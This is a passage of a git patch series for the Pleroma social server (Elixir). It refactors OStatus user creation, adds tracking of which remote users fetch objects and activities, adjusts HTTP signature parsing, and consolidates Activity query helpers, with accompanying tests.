- avatar: info["avatar"],
- bio: info["bio"]
- }
-
with false <- update,
- %User{} = user <- User.get_cached_by_ap_id(data.ap_id) do
+ %User{} = user <- User.get_cached_by_ap_id(info["uri"]) do
{:ok, user}
else
- _e -> User.insert_or_update_user(data)
+ _e -> User.insert_or_update_user(build_user_data(info))
end
end
end
+ defp build_user_data(info) do
+ %{
+ name: info["name"],
+ nickname: info["nickname"] <> "@" <> info["host"],
+ ap_id: info["uri"],
+ info: info,
+ avatar: info["avatar"],
+ bio: info["bio"]
+ }
+ end
+
# TODO: Just takes the first one for now.
def make_avatar_object(author_doc, rel \\ "avatar") do
href = string_from_xpath("//author[1]/link[@rel=\"#{rel}\"]/@href", author_doc)
@@ -319,23 +305,23 @@ def make_avatar_object(author_doc, rel \\ "avatar") do
if href do
%{
"type" => "Image",
- "url" => [
- %{
- "type" => "Link",
- "mediaType" => type,
- "href" => href
- }
- ]
+ "url" => [%{"type" => "Link", "mediaType" => type, "href" => href}]
}
else
nil
end
end
+ @spec gather_user_info(String.t()) :: {:ok, map()} | {:error, any()}
def gather_user_info(username) do
with {:ok, webfinger_data} <- WebFinger.finger(username),
{:ok, feed_data} <- Websub.gather_feed_data(webfinger_data["topic"]) do
- {:ok, Map.merge(webfinger_data, feed_data) |> Map.put("fqn", username)}
+ data =
+ webfinger_data
+ |> Map.merge(feed_data)
+ |> Map.put("fqn", username)
+
+ {:ok, data}
else
e ->
Logger.debug(fn -> "Couldn't gather info for #{username}" end)
@@ -371,10 +357,7 @@ def get_atom_url(body) do
def fetch_activity_from_atom_url(url, options \\ []) do
with true <- String.starts_with?(url, "http"),
{:ok, %{body: body, status: code}} when code in 200..299 <-
- HTTP.get(
- url,
- [{:Accept, "application/atom+xml"}]
- ) do
+ HTTP.get(url, [{:Accept, "application/atom+xml"}]) do
Logger.debug("Got document from #{url}, handling...")
handle_incoming(body, options)
else
diff --git a/lib/pleroma/web/ostatus/ostatus_controller.ex b/lib/pleroma/web/ostatus/ostatus_controller.ex
index 07e2a4c2d..64b2c64b3 100644
--- a/lib/pleroma/web/ostatus/ostatus_controller.ex
+++ b/lib/pleroma/web/ostatus/ostatus_controller.ex
@@ -55,12 +55,11 @@ def feed_redirect(conn, %{"nickname" => nickname}) do
def feed(conn, %{"nickname" => nickname} = params) do
with {_, %User{} = user} <- {:fetch_user, User.get_cached_by_nickname(nickname)} do
- query_params =
- Map.take(params, ["max_id"])
- |> Map.merge(%{"whole_db" => true, "actor_id" => user.ap_id})
-
activities =
- ActivityPub.fetch_public_activities(query_params)
+ params
+ |> Map.take(["max_id"])
+ |> Map.merge(%{"whole_db" => true, "actor_id" => user.ap_id})
+ |> ActivityPub.fetch_public_activities()
|> Enum.reverse()
response =
@@ -98,8 +97,7 @@ def salmon_incoming(conn, _) do
Federator.incoming_doc(doc)
- conn
- |> send_resp(200, "")
+ send_resp(conn, 200, "")
end
def object(%{assigns: %{format: format}} = conn, %{"uuid" => _uuid})
diff --git a/test/web/ostatus/ostatus_test.exs b/test/web/ostatus/ostatus_test.exs
index 803a97695..ff00c53ee 100644
--- a/test/web/ostatus/ostatus_test.exs
+++ b/test/web/ostatus/ostatus_test.exs
@@ -628,4 +628,18 @@ test "Article objects are not representable" do
refute OStatus.is_representable?(note_activity)
end
end
+
+ describe "make_user/2" do
+ test "creates new user" do
+ {:ok, user} = OStatus.make_user("https://social.heldscal.la/user/23211")
+
+ created_user =
+ User
+ |> Repo.get_by(ap_id: "https://social.heldscal.la/user/23211")
+ |> Map.put(:last_digest_emailed_at, nil)
+
+ assert user.info
+ assert user == created_user
+ end
+ end
end
From 769fb778d41df77c2514b5e3c663f3f624c0a266 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Thu, 12 Sep 2019 21:37:36 +0300
Subject: [PATCH 047/272] Track object/create activity fetches
---
lib/pleroma/delivery.ex | 58 +++++++++++++
lib/pleroma/plugs/cache.ex | 16 +++-
lib/pleroma/user.ex | 10 +++
.../activity_pub/activity_pub_controller.ex | 29 ++++++-
.../20190912065617_create_deliveries.exs | 12 +++
.../activity_pub_controller_test.exs | 83 +++++++++++++++++++
6 files changed, 206 insertions(+), 2 deletions(-)
create mode 100644 lib/pleroma/delivery.ex
create mode 100644 priv/repo/migrations/20190912065617_create_deliveries.exs
diff --git a/lib/pleroma/delivery.ex b/lib/pleroma/delivery.ex
new file mode 100644
index 000000000..f9a9e35cd
--- /dev/null
+++ b/lib/pleroma/delivery.ex
@@ -0,0 +1,58 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Delivery do
+ use Ecto.Schema
+
+ alias Pleroma.Delivery
+ alias Pleroma.FlakeId
+ alias Pleroma.User
+ alias Pleroma.Repo
+ alias Pleroma.Object
+ alias Pleroma.User
+
+ import Ecto.Changeset
+ import Ecto.Query
+
+ schema "deliveries" do
+ belongs_to(:user, User, type: FlakeId)
+ belongs_to(:object, Object)
+ end
+
+ def changeset(delivery, params \\ %{}) do
+ delivery
+ |> cast(params, [:user_id, :object_id])
+ |> foreign_key_constraint(:object_id)
+ |> foreign_key_constraint(:user_id)
+ |> unique_constraint(:user_id, name: :deliveries_user_id_object_id_index)
+ end
+
+ def create(object_id, user_id) do
+ %Delivery{}
+ |> changeset(%{user_id: user_id, object_id: object_id})
+ |> Repo.insert()
+ end
+
+ def get(object_id, user_id) do
+ from(d in Delivery, where: d.user_id == ^user_id and d.object_id == ^object_id)
+ |> Repo.one()
+ end
+
+ def get_or_create(object_id, user_id) do
+ case get(object_id, user_id) do
+ %Delivery{} = delivery -> {:ok, delivery}
+ nil -> create(object_id, user_id)
+ end
+ end
+
+ def delete_all_by_object_id(object_id) do
+ from(d in Delivery, where: d.object_id == ^object_id)
+ |> Repo.delete_all()
+ end
+
+ def get_all_by_object_id(object_id) do
+ from(d in Delivery, where: d.object_id == ^object_id)
+ |> Repo.all()
+ end
+end
diff --git a/lib/pleroma/plugs/cache.ex b/lib/pleroma/plugs/cache.ex
index a81a861d0..42d77fc1f 100644
--- a/lib/pleroma/plugs/cache.ex
+++ b/lib/pleroma/plugs/cache.ex
@@ -20,6 +20,7 @@ defmodule Pleroma.Plugs.Cache do
- `ttl`: An expiration time (time-to-live). This value should be in milliseconds or `nil` to disable expiration. Defaults to `nil`.
- `query_params`: Take URL query string into account (`true`), ignore it (`false`) or limit to specific params only (list). Defaults to `true`.
+ - `tracking_fun`: A function that is called on successfull responses, no matter if the request is cached or not. It should accept a conn as the first argument and the value assigned to `tracking_fun_data` as the second.
Additionally, you can overwrite the TTL inside a controller action by assigning `cache_ttl` to the connection struct:
@@ -56,6 +57,10 @@ def call(%{method: "GET"} = conn, opts) do
{:ok, nil} ->
cache_resp(conn, opts)
+ {:ok, {content_type, body, tracking_fun_data}} ->
+ conn = opts.tracking_fun(conn, tracking_fun_data)
+ send_cached(conn, {content_type, body})
+
{:ok, record} ->
send_cached(conn, record)
@@ -90,7 +95,16 @@ defp cache_resp(conn, opts) do
content_type = content_type(conn)
record = {content_type, body}
- Cachex.put(:web_resp_cache, key, record, ttl: ttl)
+ conn =
+ unless opts[:tracking_fun] do
+ Cachex.put(:web_resp_cache, key, {content_type, body}, ttl: ttl)
+ conn
+ else
+ tracking_fun_data = Map.get(conn.assigns, :tracking_fun_data, nil)
+ Cachex.put(:web_resp_cache, {content_type, body, tracking_fun_data}, record, ttl: ttl)
+
+ opts.tracking_fun.(conn, tracking_fun_data)
+ end
put_resp_header(conn, "x-cache", "MISS from Pleroma")
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 3aa245f2a..9614acdab 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -11,6 +11,7 @@ defmodule Pleroma.User do
alias Comeonin.Pbkdf2
alias Ecto.Multi
alias Pleroma.Activity
+ alias Pleroma.Delivery
alias Pleroma.Keys
alias Pleroma.Notification
alias Pleroma.Object
@@ -61,6 +62,7 @@ defmodule Pleroma.User do
field(:last_digest_emailed_at, :naive_datetime)
has_many(:notifications, Notification)
has_many(:registrations, Registration)
+ has_many(:deliveries, Delivery)
embeds_one(:info, User.Info)
timestamps()
@@ -1624,4 +1626,12 @@ defp put_password_hash(changeset), do: changeset
def is_internal_user?(%User{nickname: nil}), do: true
def is_internal_user?(%User{local: true, nickname: "internal." <> _}), do: true
def is_internal_user?(_), do: false
+
+ def get_delivered_users_by_object_id(object_id) do
+ from(u in User,
+ inner_join: delivery in assoc(u, :deliveries),
+ where: delivery.object_id == ^object_id
+ )
+ |> Repo.all()
+ end
end
diff --git a/lib/pleroma/web/activity_pub/activity_pub_controller.ex b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
index 705dbc1c2..009260d3f 100644
--- a/lib/pleroma/web/activity_pub/activity_pub_controller.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
@@ -6,6 +6,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubController do
use Pleroma.Web, :controller
alias Pleroma.Activity
+ alias Pleroma.Delivery
alias Pleroma.Object
alias Pleroma.Object.Fetcher
alias Pleroma.User
@@ -23,7 +24,15 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubController do
action_fallback(:errors)
- plug(Pleroma.Plugs.Cache, [query_params: false] when action in [:activity, :object])
+ plug(
+ Pleroma.Plugs.Cache,
+ [
+ query_params: false,
+ tracking_fun: &Pleroma.Web.ActivityPub.ActivityPubController.track_object_fetch/2
+ ]
+ when action in [:activity, :object]
+ )
+
plug(Pleroma.Web.FederatingPlug when action in [:inbox, :relay])
plug(:set_requester_reachable when action in [:inbox])
plug(:relay_active? when action in [:relay])
@@ -54,6 +63,7 @@ def object(conn, %{"uuid" => uuid}) do
%Object{} = object <- Object.get_cached_by_ap_id(ap_id),
{_, true} <- {:public?, Visibility.is_public?(object)} do
conn
+ |> assign(:tracking_fun_data, object.id)
|> set_cache_ttl_for(object)
|> put_resp_content_type("application/activity+json")
|> put_view(ObjectView)
@@ -64,6 +74,15 @@ def object(conn, %{"uuid" => uuid}) do
end
end
+ def track_object_fetch(conn, object_id) do
+ case conn.assigns[:user] do
+ %User{id: user_id} -> Delivery.create(object_id, user_id)
+ _ -> nil
+ end
+
+ conn
+ end
+
def object_likes(conn, %{"uuid" => uuid, "page" => page}) do
with ap_id <- o_status_url(conn, :object, uuid),
%Object{} = object <- Object.get_cached_by_ap_id(ap_id),
@@ -99,6 +118,7 @@ def activity(conn, %{"uuid" => uuid}) do
%Activity{} = activity <- Activity.normalize(ap_id),
{_, true} <- {:public?, Visibility.is_public?(activity)} do
conn
+ |> maybe_set_tracking_data(activity)
|> set_cache_ttl_for(activity)
|> put_resp_content_type("application/activity+json")
|> put_view(ObjectView)
@@ -109,6 +129,13 @@ def activity(conn, %{"uuid" => uuid}) do
end
end
+ defp maybe_set_tracking_data(conn, %Activity{data: %{"type" => "Create"}} = activity) do
+ object_id = Object.normalize(activity).id
+ assign(conn, :tracking_fun_data, object_id)
+ end
+
+ defp maybe_set_tracking_data(conn, _activity), do: assign(conn, :tracking_fun_data, nil)
+
defp set_cache_ttl_for(conn, %Activity{object: object}) do
set_cache_ttl_for(conn, object)
end
diff --git a/priv/repo/migrations/20190912065617_create_deliveries.exs b/priv/repo/migrations/20190912065617_create_deliveries.exs
new file mode 100644
index 000000000..92ca5650a
--- /dev/null
+++ b/priv/repo/migrations/20190912065617_create_deliveries.exs
@@ -0,0 +1,12 @@
+defmodule Pleroma.Repo.Migrations.CreateDeliveries do
+ use Ecto.Migration
+
+ def change do
+ create_if_not_exists table(:deliveries) do
+ add(:object_id, references(:objects, type: :id))
+ add(:user_id, references(:users, type: :uuid, on_delete: :delete_all))
+ end
+ create_if_not_exists index(:deliveries, :object_id, name: :deliveries_object_id)
+ create_if_not_exists(unique_index(:deliveries, [:user_id, :object_id]))
+ end
+end
diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs
index 9698c7099..0bab555b5 100644
--- a/test/web/activity_pub/activity_pub_controller_test.exs
+++ b/test/web/activity_pub/activity_pub_controller_test.exs
@@ -6,6 +6,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do
use Pleroma.Web.ConnCase
import Pleroma.Factory
alias Pleroma.Activity
+ alias Pleroma.Delivery
alias Pleroma.Instances
alias Pleroma.Object
alias Pleroma.User
@@ -885,4 +886,86 @@ test "it works for more than 10 users", %{conn: conn} do
assert result["totalItems"] == 15
end
end
+
+ describe "delivery tracking" do
+ test "it tracks a signed object fetch", %{conn: conn} do
+ user = insert(:user, local: false)
+ activity = insert(:note_activity)
+ object = Object.normalize(activity)
+
+ object_path = String.trim_leading(object.data["id"], Pleroma.Web.Endpoint.url())
+
+ conn
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, user)
+ |> get(object_path)
+ |> json_response(200)
+
+ assert Delivery.get(object.id, user.id)
+ end
+
+ test "it tracks a signed activity fetch", %{conn: conn} do
+ user = insert(:user, local: false)
+ activity = insert(:note_activity)
+ object = Object.normalize(activity)
+
+ activity_path = String.trim_leading(activity.data["id"], Pleroma.Web.Endpoint.url())
+
+ conn
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, user)
+ |> get(activity_path)
+ |> json_response(200)
+
+ assert Delivery.get(object.id, user.id)
+ end
+
+ test "it tracks a signed object fetch when the json is cached", %{conn: conn} do
+ user = insert(:user, local: false)
+ other_user = insert(:user, local: false)
+ activity = insert(:note_activity)
+ object = Object.normalize(activity)
+
+ object_path = String.trim_leading(object.data["id"], Pleroma.Web.Endpoint.url())
+
+ conn
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, user)
+ |> get(object_path)
+ |> json_response(200)
+
+ build_conn()
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, other_user)
+ |> get(object_path)
+ |> json_response(200)
+
+ assert Delivery.get(object.id, user.id)
+ assert Delivery.get(object.id, other_user.id)
+ end
+
+ test "it tracks a signed activity fetch when the json is cached", %{conn: conn} do
+ user = insert(:user, local: false)
+ other_user = insert(:user, local: false)
+ activity = insert(:note_activity)
+ object = Object.normalize(activity)
+
+ activity_path = String.trim_leading(activity.data["id"], Pleroma.Web.Endpoint.url())
+
+ conn
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, user)
+ |> get(activity_path)
+ |> json_response(200)
+
+ build_conn()
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, other_user)
+ |> get(activity_path)
+ |> json_response(200)
+
+ assert Delivery.get(object.id, user.id)
+ assert Delivery.get(object.id, other_user.id)
+ end
+ end
end
From dabc4a00f5cf08dac75f701457a24fce8735175f Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Thu, 12 Sep 2019 22:10:15 +0300
Subject: [PATCH 048/272] Put the cache with the right key when using a
tracking function
---
lib/pleroma/plugs/cache.ex | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/plugs/cache.ex b/lib/pleroma/plugs/cache.ex
index 42d77fc1f..50b534e7b 100644
--- a/lib/pleroma/plugs/cache.ex
+++ b/lib/pleroma/plugs/cache.ex
@@ -58,7 +58,8 @@ def call(%{method: "GET"} = conn, opts) do
cache_resp(conn, opts)
{:ok, {content_type, body, tracking_fun_data}} ->
- conn = opts.tracking_fun(conn, tracking_fun_data)
+ conn = opts.tracking_fun.(conn, tracking_fun_data)
+
send_cached(conn, {content_type, body})
{:ok, record} ->
@@ -93,7 +94,6 @@ defp cache_resp(conn, opts) do
ttl = Map.get(conn.assigns, :cache_ttl, opts.ttl)
key = cache_key(conn, opts)
content_type = content_type(conn)
- record = {content_type, body}
conn =
unless opts[:tracking_fun] do
@@ -101,7 +101,7 @@ defp cache_resp(conn, opts) do
conn
else
tracking_fun_data = Map.get(conn.assigns, :tracking_fun_data, nil)
- Cachex.put(:web_resp_cache, {content_type, body, tracking_fun_data}, record, ttl: ttl)
+ Cachex.put(:web_resp_cache, key, {content_type, body, tracking_fun_data}, ttl: ttl)
opts.tracking_fun.(conn, tracking_fun_data)
end
From b0e60580215e26caae6452099fa1fbace525937c Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Thu, 12 Sep 2019 22:40:53 +0300
Subject: [PATCH 049/272] Parse http signature for request to
objects/activities
---
lib/pleroma/plugs/http_signature.ex | 3 ++-
lib/pleroma/web/router.ex | 2 ++
2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/plugs/http_signature.ex b/lib/pleroma/plugs/http_signature.ex
index d87fa52fa..23d22a712 100644
--- a/lib/pleroma/plugs/http_signature.ex
+++ b/lib/pleroma/plugs/http_signature.ex
@@ -15,7 +15,8 @@ def call(%{assigns: %{valid_signature: true}} = conn, _opts) do
end
def call(conn, _opts) do
- [signature | _] = get_req_header(conn, "signature")
+ headers = get_req_header(conn, "signature")
+ signature = Enum.at(headers, 0)
if signature do
# set (request-target) header to the appropriate value
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 7cd59acb2..badc7e048 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -135,6 +135,7 @@ defmodule Pleroma.Web.Router do
pipeline :http_signature do
plug(Pleroma.Web.Plugs.HTTPSignaturePlug)
+ plug(Pleroma.Web.Plugs.MappedSignatureToIdentityPlug)
end
scope "/api/pleroma", Pleroma.Web.TwitterAPI do
@@ -513,6 +514,7 @@ defmodule Pleroma.Web.Router do
scope "/", Pleroma.Web do
pipe_through(:ostatus)
+ pipe_through(:http_signature)
get("/objects/:uuid", OStatus.OStatusController, :object)
get("/activities/:uuid", OStatus.OStatusController, :activity)
From 58b17196fa3f2583db5ee0534766350ed25727e0 Mon Sep 17 00:00:00 2001
From: Maksim
Date: Fri, 13 Sep 2019 03:58:58 +0000
Subject: [PATCH 050/272] Apply suggestion to
test/web/mastodon_api/mastodon_api_controller_test.exs
---
test/web/mastodon_api/mastodon_api_controller_test.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index a331d6455..7b337044c 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -1552,7 +1552,7 @@ test "returns the relationships for the current user", %{conn: conn} do
assert to_string(other_user.id) == relationship["id"]
end
- test "returns an empty list when bad request", %{conn: conn} do
+ test "returns an empty list on a bad request", %{conn: conn} do
user = insert(:user)
conn =
From d8a178274bd1eb642270e52f207849014cba12bc Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Fri, 13 Sep 2019 07:12:34 +0300
Subject: [PATCH 051/272] fix Activity.get_by_id
---
lib/pleroma/activity.ex | 15 +++++++++++----
.../mastodon_api/mastodon_api_controller_test.exs | 9 +++++++++
2 files changed, 20 insertions(+), 4 deletions(-)
diff --git a/lib/pleroma/activity.ex b/lib/pleroma/activity.ex
index 2d4e9da0c..56c51aef8 100644
--- a/lib/pleroma/activity.ex
+++ b/lib/pleroma/activity.ex
@@ -150,11 +150,18 @@ def get_by_ap_id_with_object(ap_id) do
)
end
+ @spec get_by_id(String.t()) :: Activity.t() | nil
def get_by_id(id) do
- Activity
- |> where([a], a.id == ^id)
- |> restrict_deactivated_users()
- |> Repo.one()
+ case Pleroma.FlakeId.is_flake_id?(id) do
+ true ->
+ Activity
+ |> where([a], a.id == ^id)
+ |> restrict_deactivated_users()
+ |> Repo.one()
+
+ _ ->
+ nil
+ end
end
def get_by_id_with_object(id) do
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 7b337044c..35c2236c8 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -2864,6 +2864,15 @@ test "returns empty object when id invalid", %{conn: conn} do
assert response == %{}
end
+
+ test "returns empty object when id isn't FlakeID", %{conn: conn} do
+ response =
+ conn
+ |> get("/api/v1/statuses/3ebbadd1-eb14-4e20-8118/card")
+ |> json_response(200)
+
+ assert response == %{}
+ end
end
test "bookmarks" do
From 39dc9b470c7ad8348a13f181039f11d14a42fa2b Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Tue, 3 Sep 2019 21:58:30 +0700
Subject: [PATCH 052/272] Cleanup Pleroma.Activity and
Pleroma.Web.ActivityPub.Utils
---
lib/pleroma/activity.ex | 193 ++++++--------------------
lib/pleroma/activity/queries.ex | 32 ++++-
lib/pleroma/user.ex | 2 +-
lib/pleroma/web/activity_pub/utils.ex | 167 ++++++++--------------
test/user_test.exs | 2 +-
5 files changed, 128 insertions(+), 268 deletions(-)
diff --git a/lib/pleroma/activity.ex b/lib/pleroma/activity.ex
index 44f1e3011..ec558168a 100644
--- a/lib/pleroma/activity.ex
+++ b/lib/pleroma/activity.ex
@@ -6,6 +6,7 @@ defmodule Pleroma.Activity do
use Ecto.Schema
alias Pleroma.Activity
+ alias Pleroma.Activity.Queries
alias Pleroma.ActivityExpiration
alias Pleroma.Bookmark
alias Pleroma.Notification
@@ -65,8 +66,8 @@ defmodule Pleroma.Activity do
timestamps()
end
- def with_joined_object(query) do
- join(query, :inner, [activity], o in Object,
+ def with_joined_object(query, join_type \\ :inner) do
+ join(query, join_type, [activity], o in Object,
on:
fragment(
"(?->>'id') = COALESCE(?->'object'->>'id', ?->>'object')",
@@ -78,10 +79,10 @@ def with_joined_object(query) do
)
end
- def with_preloaded_object(query) do
+ def with_preloaded_object(query, join_type \\ :inner) do
query
|> has_named_binding?(:object)
- |> if(do: query, else: with_joined_object(query))
+ |> if(do: query, else: with_joined_object(query, join_type))
|> preload([activity, object: object], object: object)
end
@@ -107,12 +108,9 @@ def with_set_thread_muted_field(query, %User{} = user) do
def with_set_thread_muted_field(query, _), do: query
def get_by_ap_id(ap_id) do
- Repo.one(
- from(
- activity in Activity,
- where: fragment("(?)->>'id' = ?", activity.data, ^to_string(ap_id))
- )
- )
+ ap_id
+ |> Queries.by_ap_id()
+ |> Repo.one()
end
def get_bookmark(%Activity{} = activity, %User{} = user) do
@@ -133,21 +131,10 @@ def change(struct, params \\ %{}) do
end
def get_by_ap_id_with_object(ap_id) do
- Repo.one(
- from(
- activity in Activity,
- where: fragment("(?)->>'id' = ?", activity.data, ^to_string(ap_id)),
- left_join: o in Object,
- on:
- fragment(
- "(?->>'id') = COALESCE(?->'object'->>'id', ?->>'object')",
- o.data,
- activity.data,
- activity.data
- ),
- preload: [object: o]
- )
- )
+ ap_id
+ |> Queries.by_ap_id()
+ |> with_preloaded_object(:left)
+ |> Repo.one()
end
def get_by_id(id) do
@@ -158,18 +145,9 @@ def get_by_id(id) do
end
def get_by_id_with_object(id) do
- from(activity in Activity,
- where: activity.id == ^id,
- inner_join: o in Object,
- on:
- fragment(
- "(?->>'id') = COALESCE(?->'object'->>'id', ?->>'object')",
- o.data,
- activity.data,
- activity.data
- ),
- preload: [object: o]
- )
+ Activity
+ |> where(id: ^id)
+ |> with_preloaded_object()
|> Repo.one()
end
@@ -180,51 +158,21 @@ def all_by_ids_with_object(ids) do
|> Repo.all()
end
- def by_object_ap_id(ap_id) do
- from(
- activity in Activity,
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^to_string(ap_id)
- )
- )
+ @doc """
+ Accepts `ap_id` or list of `ap_id`.
+ Returns a query.
+ """
+ @spec create_by_object_ap_id(String.t() | [String.t()]) :: Ecto.Queryable.t()
+ def create_by_object_ap_id(ap_id) do
+ ap_id
+ |> Queries.by_object_id()
+ |> Queries.by_type("Create")
end
- def create_by_object_ap_id(ap_ids) when is_list(ap_ids) do
- from(
- activity in Activity,
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ANY(?)",
- activity.data,
- activity.data,
- ^ap_ids
- ),
- where: fragment("(?)->>'type' = 'Create'", activity.data)
- )
- end
-
- def create_by_object_ap_id(ap_id) when is_binary(ap_id) do
- from(
- activity in Activity,
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^to_string(ap_id)
- ),
- where: fragment("(?)->>'type' = 'Create'", activity.data)
- )
- end
-
- def create_by_object_ap_id(_), do: nil
-
def get_all_create_by_object_ap_id(ap_id) do
- Repo.all(create_by_object_ap_id(ap_id))
+ ap_id
+ |> create_by_object_ap_id()
+ |> Repo.all()
end
def get_create_by_object_ap_id(ap_id) when is_binary(ap_id) do
@@ -235,54 +183,17 @@ def get_create_by_object_ap_id(ap_id) when is_binary(ap_id) do
def get_create_by_object_ap_id(_), do: nil
- def create_by_object_ap_id_with_object(ap_ids) when is_list(ap_ids) do
- from(
- activity in Activity,
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ANY(?)",
- activity.data,
- activity.data,
- ^ap_ids
- ),
- where: fragment("(?)->>'type' = 'Create'", activity.data),
- inner_join: o in Object,
- on:
- fragment(
- "(?->>'id') = COALESCE(?->'object'->>'id', ?->>'object')",
- o.data,
- activity.data,
- activity.data
- ),
- preload: [object: o]
- )
+ @doc """
+ Accepts `ap_id` or list of `ap_id`.
+ Returns a query.
+ """
+ @spec create_by_object_ap_id_with_object(String.t() | [String.t()]) :: Ecto.Queryable.t()
+ def create_by_object_ap_id_with_object(ap_id) do
+ ap_id
+ |> create_by_object_ap_id()
+ |> with_preloaded_object()
end
- def create_by_object_ap_id_with_object(ap_id) when is_binary(ap_id) do
- from(
- activity in Activity,
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^to_string(ap_id)
- ),
- where: fragment("(?)->>'type' = 'Create'", activity.data),
- inner_join: o in Object,
- on:
- fragment(
- "(?->>'id') = COALESCE(?->'object'->>'id', ?->>'object')",
- o.data,
- activity.data,
- activity.data
- ),
- preload: [object: o]
- )
- end
-
- def create_by_object_ap_id_with_object(_), do: nil
-
def get_create_by_object_ap_id_with_object(ap_id) when is_binary(ap_id) do
ap_id
|> create_by_object_ap_id_with_object()
@@ -306,7 +217,8 @@ def normalize(ap_id) when is_binary(ap_id), do: get_by_ap_id_with_object(ap_id)
def normalize(_), do: nil
def delete_by_ap_id(id) when is_binary(id) do
- by_object_ap_id(id)
+ id
+ |> Queries.by_object_id()
|> select([u], u)
|> Repo.delete_all()
|> elem(1)
@@ -350,31 +262,10 @@ def all_by_actor_and_id(actor, status_ids) do
end
def follow_requests_for_actor(%Pleroma.User{ap_id: ap_id}) do
- from(
- a in Activity,
- where:
- fragment(
- "? ->> 'type' = 'Follow'",
- a.data
- ),
- where:
- fragment(
- "? ->> 'state' = 'pending'",
- a.data
- ),
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- a.data,
- a.data,
- ^ap_id
- )
- )
- end
-
- @spec query_by_actor(actor()) :: Ecto.Query.t()
- def query_by_actor(actor) do
- from(a in Activity, where: a.actor == ^actor)
+ ap_id
+ |> Queries.by_object_id()
+ |> Queries.by_type("Follow")
+ |> where([a], fragment("? ->> 'state' = 'pending'", a.data))
end
def restrict_deactivated_users(query) do
diff --git a/lib/pleroma/activity/queries.ex b/lib/pleroma/activity/queries.ex
index aa5b29566..13fa33831 100644
--- a/lib/pleroma/activity/queries.ex
+++ b/lib/pleroma/activity/queries.ex
@@ -13,6 +13,14 @@ defmodule Pleroma.Activity.Queries do
alias Pleroma.Activity
+ @spec by_ap_id(query, String.t()) :: query
+ def by_ap_id(query \\ Activity, ap_id) do
+ from(
+ activity in query,
+ where: fragment("(?)->>'id' = ?", activity.data, ^to_string(ap_id))
+ )
+ end
+
@spec by_actor(query, String.t()) :: query
def by_actor(query \\ Activity, actor) do
from(
@@ -21,8 +29,23 @@ def by_actor(query \\ Activity, actor) do
)
end
- @spec by_object_id(query, String.t()) :: query
- def by_object_id(query \\ Activity, object_id) do
+ @spec by_object_id(query, String.t() | [String.t()]) :: query
+ def by_object_id(query \\ Activity, object_id)
+
+ def by_object_id(query, object_ids) when is_list(object_ids) do
+ from(
+ activity in query,
+ where:
+ fragment(
+ "coalesce((?)->'object'->>'id', (?)->>'object') = ANY(?)",
+ activity.data,
+ activity.data,
+ ^object_ids
+ )
+ )
+ end
+
+ def by_object_id(query, object_id) when is_binary(object_id) do
from(activity in query,
where:
fragment(
@@ -41,9 +64,4 @@ def by_type(query \\ Activity, activity_type) do
where: fragment("(?)->>'type' = ?", activity.data, ^activity_type)
)
end
-
- @spec limit(query, pos_integer()) :: query
- def limit(query \\ Activity, limit) do
- from(activity in query, limit: ^limit)
- end
end
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 3aa245f2a..ceca11def 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -1219,7 +1219,7 @@ def follow_import(%User{} = follower, followed_identifiers) when is_list(followe
def delete_user_activities(%User{ap_id: ap_id} = user) do
ap_id
- |> Activity.query_by_actor()
+ |> Activity.Queries.by_actor()
|> RepoStreamer.chunk_stream(50)
|> Stream.each(fn activities ->
Enum.each(activities, &delete_activity(&1))
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index c9c0c3763..47917f5d3 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -85,15 +85,13 @@ defp extract_list(lst) when is_list(lst), do: lst
defp extract_list(_), do: []
def maybe_splice_recipient(ap_id, params) do
- need_splice =
+ need_splice? =
